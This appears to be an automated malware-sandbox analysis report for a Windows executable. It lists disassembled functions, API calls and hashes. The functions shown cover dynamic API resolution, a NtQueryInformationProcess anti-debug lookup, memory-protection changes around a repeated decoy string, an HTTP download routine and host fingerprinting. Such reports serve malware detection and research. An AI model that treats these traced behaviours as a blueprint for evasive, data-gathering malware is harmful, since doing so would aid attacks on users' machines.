37579 6caab0 lstrcpy 37578->37579 37581 6caca4 37579->37581 37580->37578 37581->37381 37582->37496 37584 6b4f3e 37583->37584 37585 6ba249 LocalAlloc 37583->37585 37584->37384 37584->37386 37585->37584 37586 6ba264 CryptStringToBinaryA 37585->37586 37586->37584 37587 6ba289 LocalFree 37586->37587 37587->37584 37588->37566 37589->37506

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 6c9bb0-6c9bc4 call 6c9aa0 663 6c9bca-6c9dde call 6c9ad0 GetProcAddress * 21 660->663 664 6c9de3-6c9e42 LoadLibraryA * 5 660->664 663->664 666 6c9e5d-6c9e64 664->666 667 6c9e44-6c9e58 GetProcAddress 664->667 669 6c9e96-6c9e9d 666->669 670 6c9e66-6c9e91 GetProcAddress * 2 666->670 667->666 671 6c9e9f-6c9eb3 GetProcAddress 669->671 672 6c9eb8-6c9ebf 669->672 670->669 671->672 673 6c9ed9-6c9ee0 672->673 674 6c9ec1-6c9ed4 GetProcAddress 672->674 675 6c9f11-6c9f12 673->675 676 6c9ee2-6c9f0c GetProcAddress * 2 673->676 674->673 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,01472320), ref: 006C9BF1
                                  • GetProcAddress.KERNEL32(74DD0000,01472350), ref: 006C9C0A
                                  • GetProcAddress.KERNEL32(74DD0000,01472380), ref: 006C9C22
                                  • GetProcAddress.KERNEL32(74DD0000,014724D0), ref: 006C9C3A
                                  • GetProcAddress.KERNEL32(74DD0000,01472398), ref: 006C9C53
                                  • GetProcAddress.KERNEL32(74DD0000,014791D8), ref: 006C9C6B
                                  • GetProcAddress.KERNEL32(74DD0000,01465E50), ref: 006C9C83
                                  • GetProcAddress.KERNEL32(74DD0000,01465BF0), ref: 006C9C9C
                                  • GetProcAddress.KERNEL32(74DD0000,014723B0), ref: 006C9CB4
                                  • GetProcAddress.KERNEL32(74DD0000,014723C8), ref: 006C9CCC
                                  • GetProcAddress.KERNEL32(74DD0000,01472500), ref: 006C9CE5
                                  • GetProcAddress.KERNEL32(74DD0000,014723E0), ref: 006C9CFD
                                  • GetProcAddress.KERNEL32(74DD0000,01465E30), ref: 006C9D15
                                  • GetProcAddress.KERNEL32(74DD0000,01472218), ref: 006C9D2E
                                  • GetProcAddress.KERNEL32(74DD0000,01472248), ref: 006C9D46
                                  • GetProcAddress.KERNEL32(74DD0000,01465AF0), ref: 006C9D5E
                                  • GetProcAddress.KERNEL32(74DD0000,01472428), ref: 006C9D77
                                  • GetProcAddress.KERNEL32(74DD0000,01472440), ref: 006C9D8F
                                  • GetProcAddress.KERNEL32(74DD0000,01465B30), ref: 006C9DA7
                                  • GetProcAddress.KERNEL32(74DD0000,01472290), ref: 006C9DC0
                                  • GetProcAddress.KERNEL32(74DD0000,01465C30), ref: 006C9DD8
                                  • LoadLibraryA.KERNEL32(01472530,?,006C6CA0), ref: 006C9DEA
                                  • LoadLibraryA.KERNEL32(01472548,?,006C6CA0), ref: 006C9DFB
                                  • LoadLibraryA.KERNEL32(014725A8,?,006C6CA0), ref: 006C9E0D
                                  • LoadLibraryA.KERNEL32(01472578,?,006C6CA0), ref: 006C9E1F
                                  • LoadLibraryA.KERNEL32(014725D8,?,006C6CA0), ref: 006C9E30
                                  • GetProcAddress.KERNEL32(75A70000,01472518), ref: 006C9E52
                                  • GetProcAddress.KERNEL32(75290000,01472560), ref: 006C9E73
                                  • GetProcAddress.KERNEL32(75290000,01472590), ref: 006C9E8B
                                  • GetProcAddress.KERNEL32(75BD0000,014725C0), ref: 006C9EAD
                                  • GetProcAddress.KERNEL32(75450000,01465BB0), ref: 006C9ECE
                                  • GetProcAddress.KERNEL32(76E90000,01479178), ref: 006C9EEF
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 006C9F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 006C9EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 47b8776439cef0bc99a26c79833415518bc3bb43beacc8942382ec53c3b7bb5c
                                  • Instruction ID: 3dcd6b084c3a3e603e3176e131321094888a8b36771c86dfff5b289b20621f30
                                  • Opcode Fuzzy Hash: 47b8776439cef0bc99a26c79833415518bc3bb43beacc8942382ec53c3b7bb5c
                                  • Instruction Fuzzy Hash: 67A1EBB653C200DFC344DFE9ED88A56BBA9A74D701720861ABA19C7774D738E940EF60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 6b4610-6b46e5 RtlAllocateHeap 781 6b46f0-6b46f6 764->781 782 6b479f-6b47f9 VirtualProtect 781->782 783 6b46fc-6b479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006B465E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 006B47EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4707
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B47B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B4728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 006B46A7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 2d9b9d12341dd91ad2d0c07de9497cac151c33d0cde0eb60346d760ff31a11b9
                                  • Instruction ID: a6db5eeed6992a1f89079bf7eb97329111ea98db24c451a31fe0b182d546d6c5
                                  • Opcode Fuzzy Hash: 2d9b9d12341dd91ad2d0c07de9497cac151c33d0cde0eb60346d760ff31a11b9
                                  • Instruction Fuzzy Hash: 53416560FE261C7EC63CF7E6886EE9D77635F42749F01504AF80952B80CBB245884DAA

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 6b62d0-6b635b call 6caab0 call 6b4800 call 6caa50 InternetOpenA StrCmpCA 1040 6b635d 1033->1040 1041 6b6364-6b6368 1033->1041 1040->1041 1042 6b6559-6b6575 call 6caab0 call 6cab10 * 2 1041->1042 1043 6b636e-6b6392 InternetConnectA 1041->1043 1062 6b6578-6b657d 1042->1062 1045 6b6398-6b639c 1043->1045 1046 6b654f-6b6553 InternetCloseHandle 1043->1046 1048 6b63aa 1045->1048 1049 6b639e-6b63a8 1045->1049 1046->1042 1050 6b63b4-6b63e2 HttpOpenRequestA 1048->1050 1049->1050 1052 6b63e8-6b63ec 1050->1052 1053 6b6545-6b6549 InternetCloseHandle 1050->1053 1055 6b63ee-6b640f InternetSetOptionA 1052->1055 1056 6b6415-6b6455 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 6b647c-6b649b call 6c8ad0 1056->1058 1059 6b6457-6b6477 call 6caa50 call 6cab10 * 2 1056->1059 1067 6b6519-6b6539 call 6caa50 call 6cab10 * 2 1058->1067 1068 6b649d-6b64a4 1058->1068 1059->1062 1067->1062 1069 6b6517-6b653f InternetCloseHandle 1068->1069 1070 6b64a6-6b64d0 InternetReadFile 1068->1070 1069->1053 1073 6b64db 1070->1073 1074 6b64d2-6b64d9 1070->1074 1073->1069 1074->1073 1078 6b64dd-6b6515 call 6cacc0 call 6cabb0 call 6cab10 1074->1078 1078->1070
                                  APIs
                                    • Part of subcall function 006CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 006CAAF6
                                    • Part of subcall function 006B4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006B4889
                                    • Part of subcall function 006B4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 006B4899
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  • InternetOpenA.WININET(006D0DFF,00000001,00000000,00000000,00000000), ref: 006B6331
                                  • StrCmpCA.SHLWAPI(?,0147EA58), ref: 006B6353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006B6385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0147E158,00000000,00000000,00400100,00000000), ref: 006B63D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006B640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006B6421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006B644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006B64BD
                                  • InternetCloseHandle.WININET(00000000), ref: 006B653F
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6549
                                  • InternetCloseHandle.WININET(00000000), ref: 006B6553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 7ee9a8c1fe3ec2d449fcaadda5302d55b268f06d6df2b54358708721311550a0
                                  • Instruction ID: d912f63a96d05c71219c12babcc62a4077c0cf62d7e0a9d04ac36aac592d18ed
                                  • Opcode Fuzzy Hash: 7ee9a8c1fe3ec2d449fcaadda5302d55b268f06d6df2b54358708721311550a0
                                  • Instruction Fuzzy Hash: 617160B1A04218ABDB24DFD0DC59FEEB776EB44700F108199F2066B290DBB4AE84DF55

                                  Control-flow Graph
                                  control_flow_graph 1356 6c7690-6c76da GetWindowsDirectoryA 1357 6c76dc 1356->1357 1358 6c76e3-6c7757 GetVolumeInformationA call 6c8e90 * 3 1356->1358 1357->1358 1365 6c7768-6c776f 1358->1365 1366 6c778c-6c77a7 GetProcessHeap RtlAllocateHeap 1365->1366 1367 6c7771-6c778a call 6c8e90 1365->1367 1369 6c77b8-6c77e8 wsprintfA call 6caa50 1366->1369 1370 6c77a9-6c77b6 call 6caa50 1366->1370 1367->1365 1377 6c780e-6c781e 1369->1377 1370->1377
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006C76D2
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006C770F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006C7793
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C779A
                                  • wsprintfA.USER32 ref: 006C77D0
                                    • Part of subcall function 006CAA50: lstrcpy.KERNEL32(006D0E1A,00000000), ref: 006CAA98
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\
                                  • API String ID: 1544550907-3809124531
                                  • Opcode ID: 72ed1756915a5c127f531e66db82e6878087920ada5f1b6fdc2f920f632b2267
                                  • Instruction ID: c4b386a149682fad84b03033f5ade9a6cc91313830712bffb1781a709d6b54ee
                                  • Opcode Fuzzy Hash: 72ed1756915a5c127f531e66db82e6878087920ada5f1b6fdc2f920f632b2267
                                  • Instruction Fuzzy Hash: 714173B1D082489BDB10DF94DC85FEEBBB9EB48704F10419DF609AB280D775AA44CFA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006B11B7), ref: 006C7A10
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 006C7A17
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006C7A2F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.0000000000986000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000B1C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000BFA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C1F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C29000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763194272.0000000000C37000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763405485.0000000000C38000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763495987.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763551714.0000000000DD3000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: 8ae88e6af5f7cf4826a98b00287100442a40a812400c416358fa2978fcff6a46
                                  • Instruction ID: 2861e604934c7c78a3ae79b60c52abaf8d42b3b6c5d32a640752eebc9364a896
                                  • Opcode Fuzzy Hash: 8ae88e6af5f7cf4826a98b00287100442a40a812400c416358fa2978fcff6a46
                                  • Instruction Fuzzy Hash: FEF04FB1948209EFC700DFD8DD45FAEFBB8EB49711F10021AF615A2780C77555008BA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true
                                  • Associated: 00000000.00000002.1763010966.00000000006B0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000006DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.00000000007F9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1763025925.000000000081E000.00000040.00000001.01000000.00000003.sdmp
